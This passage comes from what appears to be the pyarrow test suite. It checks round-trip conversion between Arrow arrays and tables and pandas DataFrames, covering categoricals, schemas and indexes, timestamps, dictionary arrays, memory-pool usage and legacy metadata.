'strings2': v1 * repeats,
'strings3': v3 * repeats}
df = pd.DataFrame(arrays)
_check_pandas_roundtrip(df)
for k in arrays:
_check_array_roundtrip(arrays[k])
def test_category_implicit_from_pandas(self):
# ARROW-3374
def _check(v):
arr = pa.array(v)
result = arr.to_pandas()
tm.assert_series_equal(pd.Series(result), pd.Series(v))
arrays = [
pd.Categorical(['a', 'b', 'c'], categories=['a', 'b']),
pd.Categorical(['a', 'b', 'c'], categories=['a', 'b'],
ordered=True)
]
for arr in arrays:
_check(arr)
def test_empty_category(self):
# ARROW-2443
df = pd.DataFrame({'cat': pd.Categorical([])})
_check_pandas_roundtrip(df)
def test_category_zero_chunks(self):
# ARROW-5952
for pa_type, dtype in [(pa.string(), 'object'), (pa.int64(), 'int64')]:
a = pa.chunked_array([], pa.dictionary(pa.int8(), pa_type))
result = a.to_pandas()
expected = pd.Categorical([], categories=np.array([], dtype=dtype))
tm.assert_series_equal(pd.Series(result), pd.Series(expected))
table = pa.table({'a': a})
result = table.to_pandas()
expected = pd.DataFrame({'a': expected})
tm.assert_frame_equal(result, expected)
def test_mixed_types_fails(self):
data = pd.DataFrame({'a': ['a', 1, 2.0]})
with pytest.raises(pa.ArrowTypeError):
pa.Table.from_pandas(data)
data = pd.DataFrame({'a': [1, True]})
with pytest.raises(pa.ArrowTypeError):
pa.Table.from_pandas(data)
data = pd.DataFrame({'a': ['a', 1, 2.0]})
expected_msg = 'Conversion failed for column a'
with pytest.raises(pa.ArrowTypeError, match=expected_msg):
pa.Table.from_pandas(data)
def test_strided_data_import(self):
cases = []
columns = ['a', 'b', 'c']
N, K = 100, 3
random_numbers = np.random.randn(N, K).copy() * 100
numeric_dtypes = ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8',
'f4', 'f8']
for type_name in numeric_dtypes:
cases.append(random_numbers.astype(type_name))
# strings
cases.append(np.array([random_ascii(10) for i in range(N * K)],
dtype=object)
.reshape(N, K).copy())
# booleans
boolean_objects = (np.array([True, False, True] * N, dtype=object)
.reshape(N, K).copy())
# add some nulls, so dtype comes back as objects
boolean_objects[5] = None
cases.append(boolean_objects)
cases.append(np.arange("2016-01-01T00:00:00.001", N * K,
dtype='datetime64[ms]')
.reshape(N, K).copy())
strided_mask = (random_numbers > 0).astype(bool)[:, 0]
for case in cases:
df = pd.DataFrame(case, columns=columns)
col = df['a']
_check_pandas_roundtrip(df)
_check_array_roundtrip(col)
_check_array_roundtrip(col, mask=strided_mask)
def test_all_nones(self):
def _check_series(s):
converted = pa.array(s)
assert isinstance(converted, pa.NullArray)
assert len(converted) == 3
assert converted.null_count == 3
for item in converted:
assert item is pa.NA
_check_series(pd.Series([None] * 3, dtype=object))
_check_series(pd.Series([np.nan] * 3, dtype=object))
_check_series(pd.Series([None, np.nan, None], dtype=object))
def test_partial_schema(self):
data = OrderedDict([
('a', [0, 1, 2, 3, 4]),
('b', np.array([-10, -5, 0, 5, 10], dtype=np.int32)),
('c', [-10, -5, 0, 5, 10])
])
df = pd.DataFrame(data)
partial_schema = pa.schema([
pa.field('c', pa.int64()),
pa.field('a', pa.int64())
])
_check_pandas_roundtrip(df, schema=partial_schema,
expected=df[['c', 'a']],
expected_schema=partial_schema)
def test_table_batch_empty_dataframe(self):
df = pd.DataFrame({})
_check_pandas_roundtrip(df)
_check_pandas_roundtrip(df, as_batch=True)
df2 = pd.DataFrame({}, index=[0, 1, 2])
_check_pandas_roundtrip(df2, preserve_index=True)
_check_pandas_roundtrip(df2, as_batch=True, preserve_index=True)
def test_convert_empty_table(self):
arr = pa.array([], type=pa.int64())
empty_objects = pd.Series(np.array([], dtype=object))
tm.assert_almost_equal(arr.to_pandas(),
pd.Series(np.array([], dtype=np.int64)))
arr = pa.array([], type=pa.string())
tm.assert_almost_equal(arr.to_pandas(), empty_objects)
arr = pa.array([], type=pa.list_(pa.int64()))
tm.assert_almost_equal(arr.to_pandas(), empty_objects)
arr = pa.array([], type=pa.struct([pa.field('a', pa.int64())]))
tm.assert_almost_equal(arr.to_pandas(), empty_objects)
def test_non_natural_stride(self):
"""
ARROW-2172: converting from a Numpy array with a stride that's
not a multiple of itemsize.
"""
dtype = np.dtype([('x', np.int32), ('y', np.int16)])
data = np.array([(42, -1), (-43, 2)], dtype=dtype)
assert data.strides == (6,)
arr = pa.array(data['x'], type=pa.int32())
assert arr.to_pylist() == [42, -43]
arr = pa.array(data['y'], type=pa.int16())
assert arr.to_pylist() == [-1, 2]
def test_array_from_strided_numpy_array(self):
# ARROW-5651
np_arr = np.arange(0, 10, dtype=np.float32)[1:-1:2]
pa_arr = pa.array(np_arr, type=pa.float64())
expected = pa.array([1.0, 3.0, 5.0, 7.0], type=pa.float64())
pa_arr.equals(expected)
def test_safe_unsafe_casts(self):
# ARROW-2799
df = pd.DataFrame({
'A': list('abc'),
'B': np.linspace(0, 1, 3)
})
schema = pa.schema([
pa.field('A', pa.string()),
pa.field('B', pa.int32())
])
with pytest.raises(ValueError):
pa.Table.from_pandas(df, schema=schema)
table = pa.Table.from_pandas(df, schema=schema, safe=False)
assert table.column('B').type == pa.int32()
def test_error_sparse(self):
# ARROW-2818
df = pd.DataFrame({'a': pd.SparseArray([1, np.nan, 3])})
with pytest.raises(TypeError, match="Sparse pandas data"):
pa.Table.from_pandas(df)
def test_safe_cast_from_float_with_nans_to_int():
# TODO(kszucs): write tests for creating Date32 and Date64 arrays, see
# ARROW-4258 and https://github.com/apache/arrow/pull/3395
values = pd.Series([1, 2, None, 4])
arr = pa.Array.from_pandas(values, type=pa.int32(), safe=True)
expected = pa.array([1, 2, None, 4], type=pa.int32())
assert arr.equals(expected)
def _fully_loaded_dataframe_example():
index = pd.MultiIndex.from_arrays([
pd.date_range('2000-01-01', periods=5).repeat(2),
np.tile(np.array(['foo', 'bar'], dtype=object), 5)
])
c1 = pd.date_range('2000-01-01', periods=10)
data = {
0: c1,
1: c1.tz_localize('utc'),
2: c1.tz_localize('US/Eastern'),
3: c1[::2].tz_localize('utc').repeat(2).astype('category'),
4: ['foo', 'bar'] * 5,
5: pd.Series(['foo', 'bar'] * 5).astype('category').values,
6: [True, False] * 5,
7: np.random.randn(10),
8: np.random.randint(0, 100, size=10),
9: pd.period_range('2013', periods=10, freq='M')
}
if LooseVersion(pd.__version__) >= '0.21':
# There is an issue with pickling IntervalIndex in pandas 0.20.x
data[10] = pd.interval_range(start=1, freq=1, periods=10)
return pd.DataFrame(data, index=index)
@pytest.mark.parametrize('columns', ([b'foo'], ['foo']))
def test_roundtrip_with_bytes_unicode(columns):
df = pd.DataFrame(columns=columns)
table1 = pa.Table.from_pandas(df)
table2 = pa.Table.from_pandas(table1.to_pandas())
assert table1.equals(table2)
assert table1.schema.equals(table2.schema)
assert table1.schema.metadata == table2.schema.metadata
def _check_serialize_components_roundtrip(df):
ctx = pa.default_serialization_context()
components = ctx.serialize(df).to_components()
deserialized = ctx.deserialize_components(components)
tm.assert_frame_equal(df, deserialized)
@pytest.mark.skipif(LooseVersion(np.__version__) >= '0.16',
reason='Until numpy/numpy#12745 is resolved')
def test_serialize_deserialize_pandas():
# ARROW-1784, serialize and deserialize DataFrame by decomposing
# BlockManager
df = _fully_loaded_dataframe_example()
_check_serialize_components_roundtrip(df)
def _pytime_from_micros(val):
microseconds = val % 1000000
val //= 1000000
seconds = val % 60
val //= 60
minutes = val % 60
hours = val // 60
return time(hours, minutes, seconds, microseconds)
def _pytime_to_micros(pytime):
return (pytime.hour * 3600000000 +
pytime.minute * 60000000 +
pytime.second * 1000000 +
pytime.microsecond)
def test_convert_unsupported_type_error_message():
# ARROW-1454
# period as yet unsupported
df = pd.DataFrame({
'a': pd.period_range('2000-01-01', periods=20),
})
expected_msg = 'Conversion failed for column a with type period'
with pytest.raises(pa.ArrowInvalid, match=expected_msg):
pa.Table.from_pandas(df)
# ----------------------------------------------------------------------
# Test object deduplication in to_pandas
def _generate_dedup_example(nunique, repeats):
unique_values = [tm.rands(10) for i in range(nunique)]
return unique_values * repeats
def _assert_nunique(obj, expected):
assert len({id(x) for x in obj}) == expected
def test_to_pandas_deduplicate_strings_array_types():
nunique = 100
repeats = 10
values = _generate_dedup_example(nunique, repeats)
for arr in [pa.array(values, type=pa.binary()),
pa.array(values, type=pa.utf8()),
pa.chunked_array([values, values])]:
_assert_nunique(arr.to_pandas(), nunique)
_assert_nunique(arr.to_pandas(deduplicate_objects=False), len(arr))
def test_to_pandas_deduplicate_strings_table_types():
nunique = 100
repeats = 10
values = _generate_dedup_example(nunique, repeats)
arr = pa.array(values)
rb = pa.RecordBatch.from_arrays([arr], ['foo'])
tbl = pa.Table.from_batches([rb])
for obj in [rb, tbl]:
_assert_nunique(obj.to_pandas()['foo'], nunique)
_assert_nunique(obj.to_pandas(deduplicate_objects=False)['foo'],
len(obj))
def test_to_pandas_deduplicate_integers_as_objects():
nunique = 100
repeats = 10
# Python automatically interns smaller integers
unique_values = list(np.random.randint(10000000, 1000000000, size=nunique))
unique_values[nunique // 2] = None
arr = pa.array(unique_values * repeats)
_assert_nunique(arr.to_pandas(integer_object_nulls=True), nunique)
_assert_nunique(arr.to_pandas(integer_object_nulls=True,
deduplicate_objects=False),
# Account for None
(nunique - 1) * repeats + 1)
def test_to_pandas_deduplicate_date_time():
nunique = 100
repeats = 10
unique_values = list(range(nunique))
cases = [
# raw type, array type, to_pandas options
('int32', 'date32', {'date_as_object': True}),
('int64', 'date64', {'date_as_object': True}),
('int32', 'time32[ms]', {}),
('int64', 'time64[us]', {})
]
for raw_type, array_type, pandas_options in cases:
raw_arr = pa.array(unique_values * repeats, type=raw_type)
casted_arr = raw_arr.cast(array_type)
_assert_nunique(casted_arr.to_pandas(**pandas_options),
nunique)
_assert_nunique(casted_arr.to_pandas(deduplicate_objects=False,
**pandas_options),
len(casted_arr))
# ---------------------------------------------------------------------
def test_table_from_pandas_checks_field_nullability():
# ARROW-2136
df = pd.DataFrame({'a': [1.2, 2.1, 3.1],
'b': [np.nan, 'string', 'foo']})
schema = pa.schema([pa.field('a', pa.float64(), nullable=False),
pa.field('b', pa.utf8(), nullable=False)])
with pytest.raises(ValueError):
pa.Table.from_pandas(df, schema=schema)
def test_table_from_pandas_keeps_column_order_of_dataframe():
df1 = pd.DataFrame(OrderedDict([
('partition', [0, 0, 1, 1]),
('arrays', [[0, 1, 2], [3, 4], None, None]),
('floats', [None, None, 1.1, 3.3])
]))
df2 = df1[['floats', 'partition', 'arrays']]
schema1 = pa.schema([
('partition', pa.int64()),
('arrays', pa.list_(pa.int64())),
('floats', pa.float64()),
])
schema2 = pa.schema([
('floats', pa.float64()),
('partition', pa.int64()),
('arrays', pa.list_(pa.int64()))
])
table1 = pa.Table.from_pandas(df1, preserve_index=False)
table2 = pa.Table.from_pandas(df2, preserve_index=False)
assert table1.schema.equals(schema1, check_metadata=False)
assert table2.schema.equals(schema2, check_metadata=False)
def test_table_from_pandas_keeps_column_order_of_schema():
# ARROW-3766
df = pd.DataFrame(OrderedDict([
('partition', [0, 0, 1, 1]),
('arrays', [[0, 1, 2], [3, 4], None, None]),
('floats', [None, None, 1.1, 3.3])
]))
schema = pa.schema([
('floats', pa.float64()),
('arrays', pa.list_(pa.int32())),
('partition', pa.int32())
])
df1 = df[df.partition == 0]
df2 = df[df.partition == 1][['floats', 'partition', 'arrays']]
table1 = pa.Table.from_pandas(df1, schema=schema, preserve_index=False)
table2 = pa.Table.from_pandas(df2, schema=schema, preserve_index=False)
assert table1.schema.equals(schema, check_metadata=False)
assert table1.schema.equals(table2.schema, check_metadata=False)
def test_table_from_pandas_columns_argument_only_does_filtering():
df = pd.DataFrame(OrderedDict([
('partition', [0, 0, 1, 1]),
('arrays', [[0, 1, 2], [3, 4], None, None]),
('floats', [None, None, 1.1, 3.3])
]))
columns1 = ['arrays', 'floats', 'partition']
schema1 = pa.schema([
('arrays', pa.list_(pa.int64())),
('floats', pa.float64()),
('partition', pa.int64())
])
columns2 = ['floats', 'partition']
schema2 = pa.schema([
('floats', pa.float64()),
('partition', pa.int64())
])
table1 = pa.Table.from_pandas(df, columns=columns1, preserve_index=False)
table2 = pa.Table.from_pandas(df, columns=columns2, preserve_index=False)
assert table1.schema.equals(schema1, check_metadata=False)
assert table2.schema.equals(schema2, check_metadata=False)
def test_table_from_pandas_columns_and_schema_are_mutually_exclusive():
df = pd.DataFrame(OrderedDict([
('partition', [0, 0, 1, 1]),
('arrays', [[0, 1, 2], [3, 4], None, None]),
('floats', [None, None, 1.1, 3.3])
]))
schema = pa.schema([
('partition', pa.int32()),
('arrays', pa.list_(pa.int32())),
('floats', pa.float64()),
])
columns = ['arrays', 'floats']
with pytest.raises(ValueError):
pa.Table.from_pandas(df, schema=schema, columns=columns)
def test_table_from_pandas_keeps_schema_nullability():
# ARROW-5169
df = pd.DataFrame({'a': [1, 2, 3, 4]})
schema = pa.schema([
pa.field('a', pa.int64(), nullable=False),
])
table = pa.Table.from_pandas(df)
assert table.schema.field('a').nullable is True
table = pa.Table.from_pandas(df, schema=schema)
assert table.schema.field('a').nullable is False
def test_table_from_pandas_schema_index_columns():
# ARROW-5220
df = pd.DataFrame({'a': [1, 2, 3], 'b': [0.1, 0.2, 0.3]})
schema = pa.schema([
('a', pa.int64()),
('b', pa.float64()),
('index', pa.int32()),
])
# schema includes index with name not in dataframe
with pytest.raises(KeyError, match="name 'index' present in the"):
pa.Table.from_pandas(df, schema=schema)
df.index.name = 'index'
# schema includes correct index name -> roundtrip works
_check_pandas_roundtrip(df, schema=schema, preserve_index=True,
expected_schema=schema)
# schema includes correct index name but preserve_index=False
with pytest.raises(KeyError):
pa.Table.from_pandas(df, schema=schema, preserve_index=False)
# in case of preserve_index=None -> RangeIndex serialized as metadata
# clashes with the index in the schema
with pytest.raises(ValueError, match="name 'index' is present in the "
"schema, but it is a RangeIndex"):
pa.Table.from_pandas(df, schema=schema, preserve_index=None)
df.index = pd.Index([0, 1, 2], name='index')
# for non-RangeIndex, both preserve_index=None and True work
_check_pandas_roundtrip(df, schema=schema, preserve_index=None,
expected_schema=schema)
_check_pandas_roundtrip(df, schema=schema, preserve_index=True,
expected_schema=schema)
# schema has different order (index column not at the end)
schema = pa.schema([
('index', pa.int32()),
('a', pa.int64()),
('b', pa.float64()),
])
_check_pandas_roundtrip(df, schema=schema, preserve_index=None,
expected_schema=schema)
_check_pandas_roundtrip(df, schema=schema, preserve_index=True,
expected_schema=schema)
# schema does not include the index -> index is not included as column
# even though preserve_index=True/None
schema = pa.schema([
('a', pa.int64()),
('b', pa.float64()),
])
expected = df.copy()
expected = expected.reset_index(drop=True)
_check_pandas_roundtrip(df, schema=schema, preserve_index=None,
expected_schema=schema, expected=expected)
_check_pandas_roundtrip(df, schema=schema, preserve_index=True,
expected_schema=schema, expected=expected)
# dataframe with a MultiIndex
df.index = pd.MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1)],
names=['level1', 'level2'])
schema = pa.schema([
('level1', pa.string()),
('level2', pa.int64()),
('a', pa.int64()),
('b', pa.float64()),
])
_check_pandas_roundtrip(df, schema=schema, preserve_index=True,
expected_schema=schema)
_check_pandas_roundtrip(df, schema=schema, preserve_index=None,
expected_schema=schema)
# only one of the levels of the MultiIndex is included
schema = pa.schema([
('level2', pa.int64()),
('a', pa.int64()),
('b', pa.float64()),
])
expected = df.copy()
expected = expected.reset_index('level1', drop=True)
_check_pandas_roundtrip(df, schema=schema, preserve_index=True,
expected_schema=schema, expected=expected)
_check_pandas_roundtrip(df, schema=schema, preserve_index=None,
expected_schema=schema, expected=expected)
# ----------------------------------------------------------------------
# RecordBatch, Table
def test_recordbatch_from_to_pandas():
data = pd.DataFrame({
'c1': np.array([1, 2, 3, 4, 5], dtype='int64'),
'c2': np.array([1, 2, 3, 4, 5], dtype='uint32'),
'c3': np.random.randn(5),
'c4': ['foo', 'bar', None, 'baz', 'qux'],
'c5': [False, True, False, True, False]
})
batch = pa.RecordBatch.from_pandas(data)
result = batch.to_pandas()
tm.assert_frame_equal(data, result)
def test_recordbatchlist_to_pandas():
data1 = pd.DataFrame({
'c1': np.array([1, 1, 2], dtype='uint32'),
'c2': np.array([1.0, 2.0, 3.0], dtype='float64'),
'c3': [True, None, False],
'c4': ['foo', 'bar', None]
})
data2 = pd.DataFrame({
'c1': np.array([3, 5], dtype='uint32'),
'c2': np.array([4.0, 5.0], dtype='float64'),
'c3': [True, True],
'c4': ['baz', 'qux']
})
batch1 = pa.RecordBatch.from_pandas(data1)
batch2 = pa.RecordBatch.from_pandas(data2)
table = pa.Table.from_batches([batch1, batch2])
result = table.to_pandas()
data = pd.concat([data1, data2]).reset_index(drop=True)
tm.assert_frame_equal(data, result)
def test_recordbatch_table_pass_name_to_pandas():
rb = pa.record_batch([pa.array([1, 2, 3, 4])], names=['a0'])
t = pa.table([pa.array([1, 2, 3, 4])], names=['a0'])
assert rb[0].to_pandas().name == 'a0'
assert t[0].to_pandas().name == 'a0'
# ----------------------------------------------------------------------
# Metadata serialization
@pytest.mark.parametrize(
('type', 'expected'),
[
(pa.null(), 'empty'),
(pa.bool_(), 'bool'),
(pa.int8(), 'int8'),
(pa.int16(), 'int16'),
(pa.int32(), 'int32'),
(pa.int64(), 'int64'),
(pa.uint8(), 'uint8'),
(pa.uint16(), 'uint16'),
(pa.uint32(), 'uint32'),
(pa.uint64(), 'uint64'),
(pa.float16(), 'float16'),
(pa.float32(), 'float32'),
(pa.float64(), 'float64'),
(pa.date32(), 'date'),
(pa.date64(), 'date'),
(pa.binary(), 'bytes'),
(pa.binary(length=4), 'bytes'),
(pa.string(), 'unicode'),
(pa.list_(pa.list_(pa.int16())), 'list[list[int16]]'),
(pa.decimal128(18, 3), 'decimal'),
(pa.timestamp('ms'), 'datetime'),
(pa.timestamp('us', 'UTC'), 'datetimetz'),
(pa.time32('s'), 'time'),
(pa.time64('us'), 'time')
]
)
def test_logical_type(type, expected):
assert get_logical_type(type) == expected
# ----------------------------------------------------------------------
# to_pandas uses MemoryPool
def test_array_uses_memory_pool():
# ARROW-6570
N = 10000
arr = pa.array(np.arange(N, dtype=np.int64),
mask=np.random.randint(0, 2, size=N).astype(np.bool_))
# In the case the gc is caught loafing
gc.collect()
prior_allocation = pa.total_allocated_bytes()
x = arr.to_pandas()
assert pa.total_allocated_bytes() == (prior_allocation + N * 8)
x = None # noqa
gc.collect()
assert pa.total_allocated_bytes() == prior_allocation
# zero copy does not allocate memory
arr = pa.array(np.arange(N, dtype=np.int64))
prior_allocation = pa.total_allocated_bytes()
x = arr.to_pandas() # noqa
assert pa.total_allocated_bytes() == prior_allocation
def test_table_uses_memory_pool():
N = 10000
arr = pa.array(np.arange(N, dtype=np.int64))
t = pa.table([arr], ['f0'])
prior_allocation = pa.total_allocated_bytes()
x = t.to_pandas()
assert pa.total_allocated_bytes() == (prior_allocation + N * 8)
# Check successful garbage collection
x = None # noqa
gc.collect()
assert pa.total_allocated_bytes() == prior_allocation
def test_object_leak_in_numpy_array():
# ARROW-6876
arr = pa.array([{'a': 1}])
np_arr = arr.to_pandas()
assert np_arr.dtype == np.dtype('object')
obj = np_arr[0]
refcount = sys.getrefcount(obj)
assert sys.getrefcount(obj) == refcount
del np_arr
assert sys.getrefcount(obj) == refcount - 1
def test_object_leak_in_dataframe():
# ARROW-6876
arr = pa.array([{'a': 1}])
table = pa.table([arr], ['f0'])
col = table.to_pandas()['f0']
assert col.dtype == np.dtype('object')
obj = col[0]
refcount = sys.getrefcount(obj)
assert sys.getrefcount(obj) == refcount
del col
assert sys.getrefcount(obj) == refcount - 1
# ----------------------------------------------------------------------
# Some nested array tests array tests
def test_array_from_py_float32():
data = [[1.2, 3.4], [9.0, 42.0]]
t = pa.float32()
arr1 = pa.array(data[0], type=t)
arr2 = pa.array(data, type=pa.list_(t))
expected1 = np.array(data[0], dtype=np.float32)
expected2 = pd.Series([np.array(data[0], dtype=np.float32),
np.array(data[1], dtype=np.float32)])
assert arr1.type == t
assert arr1.equals(pa.array(expected1))
assert arr2.equals(pa.array(expected2))
# ----------------------------------------------------------------------
# Timestamp tests
def test_cast_timestamp_unit():
# ARROW-1680
val = datetime.now()
s = pd.Series([val])
s_nyc = s.dt.tz_localize('tzlocal()').dt.tz_convert('America/New_York')
us_with_tz = pa.timestamp('us', tz='America/New_York')
arr = pa.Array.from_pandas(s_nyc, type=us_with_tz)
# ARROW-1906
assert arr.type == us_with_tz
arr2 = pa.Array.from_pandas(s, type=pa.timestamp('us'))
assert arr[0].as_py() == s_nyc[0].to_pydatetime()
assert arr2[0].as_py() == s[0].to_pydatetime()
# Disallow truncation
arr = pa.array([123123], type='int64').cast(pa.timestamp('ms'))
expected = pa.array([123], type='int64').cast(pa.timestamp('s'))
target = pa.timestamp('s')
with pytest.raises(ValueError):
arr.cast(target)
result = arr.cast(target, safe=False)
assert result.equals(expected)
# ARROW-1949
series = pd.Series([pd.Timestamp(1), pd.Timestamp(10), pd.Timestamp(1000)])
expected = pa.array([0, 0, 1], type=pa.timestamp('us'))
with pytest.raises(ValueError):
pa.array(series, type=pa.timestamp('us'))
with pytest.raises(ValueError):
pa.Array.from_pandas(series, type=pa.timestamp('us'))
result = pa.Array.from_pandas(series, type=pa.timestamp('us'), safe=False)
assert result.equals(expected)
result = pa.array(series, type=pa.timestamp('us'), safe=False)
assert result.equals(expected)
# ----------------------------------------------------------------------
# DictionaryArray tests
def test_dictionary_with_pandas():
indices = np.repeat([0, 1, 2], 2)
dictionary = np.array(['foo', 'bar', 'baz'], dtype=object)
mask = np.array([False, False, True, False, False, False])
d1 = pa.DictionaryArray.from_arrays(indices, dictionary)
d2 = pa.DictionaryArray.from_arrays(indices, dictionary, mask=mask)
pandas1 = d1.to_pandas()
ex_pandas1 = pd.Categorical.from_codes(indices, categories=dictionary)
tm.assert_series_equal(pd.Series(pandas1), pd.Series(ex_pandas1))
pandas2 = d2.to_pandas()
ex_pandas2 = pd.Categorical.from_codes(np.where(mask, -1, indices),
categories=dictionary)
tm.assert_series_equal(pd.Series(pandas2), pd.Series(ex_pandas2))
def random_strings(n, item_size, pct_null=0, dictionary=None):
if dictionary is not None:
result = dictionary[np.random.randint(0, len(dictionary), size=n)]
else:
result = np.array([random_ascii(item_size) for i in range(n)],
dtype=object)
if pct_null > 0:
result[np.random.rand(n) < pct_null] = None
return result
def test_variable_dictionary_to_pandas():
np.random.seed(12345)
d1 = pa.array(random_strings(100, 32), type='string')
d2 = pa.array(random_strings(100, 16), type='string')
d3 = pa.array(random_strings(10000, 10), type='string')
a1 = pa.DictionaryArray.from_arrays(
np.random.randint(0, len(d1), size=1000, dtype='i4'),
d1
)
a2 = pa.DictionaryArray.from_arrays(
np.random.randint(0, len(d2), size=1000, dtype='i4'),
d2
)
# With some nulls
a3 = pa.DictionaryArray.from_arrays(
np.random.randint(0, len(d3), size=1000, dtype='i4'), d3)
i4 = pa.array(
np.random.randint(0, len(d3), size=1000, dtype='i4'),
mask=np.random.rand(1000) < 0.1
)
a4 = pa.DictionaryArray.from_arrays(i4, d3)
expected_dict = pa.concat_arrays([d1, d2, d3])
a = pa.chunked_array([a1, a2, a3, a4])
a_dense = pa.chunked_array([a1.cast('string'),
a2.cast('string'),
a3.cast('string'),
a4.cast('string')])
result = a.to_pandas()
result_dense = a_dense.to_pandas()
assert (result.cat.categories == expected_dict.to_pandas()).all()
expected_dense = result.astype('str')
expected_dense[result_dense.isnull()] = None
tm.assert_series_equal(result_dense, expected_dense)
# ----------------------------------------------------------------------
# Array protocol in pandas conversions tests
def test_array_protocol():
if LooseVersion(pd.__version__) < '0.24.0':
pytest.skip('IntegerArray only introduced in 0.24')
df = pd.DataFrame({'a': pd.Series([1, 2, None], dtype='Int64')})
if LooseVersion(pd.__version__) < '0.26.0.dev':
# with pandas<=0.25, trying to convert nullable integer errors
with pytest.raises(TypeError):
pa.table(df)
else:
# __arrow_array__ added to pandas IntegerArray in 0.26.0.dev
# default conversion
result = pa.table(df)
expected = pa.array([1, 2, None], pa.int64())
assert result[0].chunk(0).equals(expected)
# with specifying schema
schema = pa.schema([('a', pa.float64())])
result = pa.table(df, schema=schema)
expected2 = pa.array([1, 2, None], pa.float64())
assert result[0].chunk(0).equals(expected2)
# pass Series to pa.array
result = pa.array(df['a'])
assert result.equals(expected)
result = pa.array(df['a'], type=pa.float64())
assert result.equals(expected2)
# pass actual ExtensionArray to pa.array
result = pa.array(df['a'].values)
assert result.equals(expected)
result = pa.array(df['a'].values, type=pa.float64())
assert result.equals(expected2)
# ----------------------------------------------------------------------
# Pandas ExtensionArray support
def _to_pandas(table, extension_columns=None):
# temporary test function as long as we have no public API to do this
from pyarrow.pandas_compat import table_to_blockmanager
options = dict(
pool=None,
strings_to_categorical=False,
zero_copy_only=False,
integer_object_nulls=False,
date_as_object=True,
use_threads=True,
deduplicate_objects=True)
mgr = table_to_blockmanager(
options, table, extension_columns=extension_columns)
return pd.DataFrame(mgr)
def test_convert_to_extension_array():
if LooseVersion(pd.__version__) < '0.24.0':
pytest.skip(reason='IntegerArray only introduced in 0.24')
import pandas.core.internals as _int
table = pa.table({'a': [1, 2, 3], 'b': [2, 3, 4]})
df = _to_pandas(table)
assert len(df._data.blocks) == 1
assert isinstance(df._data.blocks[0], _int.IntBlock)
df = _to_pandas(table, extension_columns=['b'])
assert isinstance(df._data.blocks[0], _int.IntBlock)
assert isinstance(df._data.blocks[1], _int.ExtensionBlock)
table = pa.table({'a': [1, 2, None]})
df = _to_pandas(table, extension_columns=['a'])
assert isinstance(df._data.blocks[0], _int.ExtensionBlock)
expected = pd.DataFrame({'a': pd.Series([1, 2, None], dtype='Int64')})
tm.assert_frame_equal(df, expected)
# ----------------------------------------------------------------------
# Legacy metadata compatibility tests
def test_metadata_compat_range_index_pre_0_12():
# Forward compatibility for metadata created from pandas.RangeIndex
# prior to pyarrow 0.13.0
a_values = [u'foo', u'bar', None, u'baz']
b_values = [u'a', u'a', u'b', u'b']
a_arrow = pa.array(a_values, type='utf8')
b_arrow = pa.array(b_values, type='utf8')
rng_index_arrow = pa.array([0, 2, 4, 6], type='int64')
gen_name_0 = '__index_level_0__'
gen_name_1 = '__index_level_1__'
# Case 1: named RangeIndex
e1 = pd.DataFrame({
'a': a_values
}, index=pd.RangeIndex(0, 8, step=2, name='qux'))
t1 = pa.Table.from_arrays([a_arrow, rng_index_arrow],
names=['a', 'qux'])
t1 = t1.replace_schema_metadata({
b'pandas': json.dumps(
{'index_columns': ['qux'],
'column_indexes': [{'name': None,
'field_name': None,
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': {'encoding': 'UTF-8'}}],
'columns': [{'name': 'a',
'field_name': 'a',
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': None},
{'name': 'qux',
'field_name': 'qux',
'pandas_type': 'int64',
'numpy_type': 'int64',
'metadata': None}],
'pandas_version': '0.23.4'}
)})
r1 = t1.to_pandas()
tm.assert_frame_equal(r1, e1)
# Case 2: named RangeIndex, but conflicts with an actual column
e2 = pd.DataFrame({
'qux': a_values
}, index=pd.RangeIndex(0, 8, step=2, name='qux'))
t2 = pa.Table.from_arrays([a_arrow, rng_index_arrow],
names=['qux', gen_name_0])
t2 = t2.replace_schema_metadata({
b'pandas': json.dumps(
{'index_columns': [gen_name_0],
'column_indexes': [{'name': None,
'field_name': None,
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': {'encoding': 'UTF-8'}}],
'columns': [{'name': 'a',
'field_name': 'a',
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': None},
{'name': 'qux',
'field_name': gen_name_0,
'pandas_type': 'int64',
'numpy_type': 'int64',
'metadata': None}],
'pandas_version': '0.23.4'}
)})
r2 = t2.to_pandas()
tm.assert_frame_equal(r2, e2)
# Case 3: unnamed RangeIndex
e3 = pd.DataFrame({
'a': a_values
}, index=pd.RangeIndex(0, 8, step=2, name=None))
t3 = pa.Table.from_arrays([a_arrow, rng_index_arrow],
names=['a', gen_name_0])
t3 = t3.replace_schema_metadata({
b'pandas': json.dumps(
{'index_columns': [gen_name_0],
'column_indexes': [{'name': None,
'field_name': None,
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': {'encoding': 'UTF-8'}}],
'columns': [{'name': 'a',
'field_name': 'a',
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': None},
{'name': None,
'field_name': gen_name_0,
'pandas_type': 'int64',
'numpy_type': 'int64',
'metadata': None}],
'pandas_version': '0.23.4'}
)})
r3 = t3.to_pandas()
tm.assert_frame_equal(r3, e3)
# Case 4: MultiIndex with named RangeIndex
e4 = pd.DataFrame({
'a': a_values
}, index=[pd.RangeIndex(0, 8, step=2, name='qux'), b_values])
t4 = pa.Table.from_arrays([a_arrow, rng_index_arrow, b_arrow],
names=['a', 'qux', gen_name_1])
t4 = t4.replace_schema_metadata({
b'pandas': json.dumps(
{'index_columns': ['qux', gen_name_1],
'column_indexes': [{'name': None,
'field_name': None,
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': {'encoding': 'UTF-8'}}],
'columns': [{'name': 'a',
'field_name': 'a',
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': None},
{'name': 'qux',
'field_name': 'qux',
'pandas_type': 'int64',
'numpy_type': 'int64',
'metadata': None},
{'name': None,
'field_name': gen_name_1,
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': None}],
'pandas_version': '0.23.4'}
)})
r4 = t4.to_pandas()
tm.assert_frame_equal(r4, e4)
# Case 4: MultiIndex with unnamed RangeIndex
e5 = pd.DataFrame({
'a': a_values
}, index=[pd.RangeIndex(0, 8, step=2, name=None), b_values])
t5 = pa.Table.from_arrays([a_arrow, rng_index_arrow, b_arrow],
names=['a', gen_name_0, gen_name_1])
